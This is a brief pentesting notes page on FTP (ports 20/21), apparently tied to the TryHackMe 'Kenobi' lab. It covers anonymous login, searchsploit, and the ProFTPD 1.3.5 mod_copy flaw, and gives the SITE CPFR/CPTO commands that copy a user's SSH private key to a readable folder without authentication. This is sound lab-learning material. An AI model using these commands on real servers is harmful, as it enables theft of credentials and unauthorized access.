Port 20/21 - FTP Pentesting

Port 21 Pentesting

Facts

default login (anonymous)

Download files

get

Gain initial access with ProFtpd

search for exploits for proFtpd 1.3.5

eg: kenobi THM

searchsploit proftpd 1.3.5

The vulnerable Proftpd 1.3.5 version allows copying of files unauthenticated. copy the ssh key we found earlier to var folder.

The mod_copy module implements SITE CPFR and SITE CPTO commands, which can be used to copy files/directories from one place to another on the server. Any unauthenticated client can leverage these commands to copy files from any part of the filesystem to a chosen destination.

SITE CPFR /home/kenobi/.ssh/id_rsa
SITE CPTO /var/tmp/id_rsa

PreviousPass the Hash (PtH)NextPort 21 Telnet

Last updated 1 year ago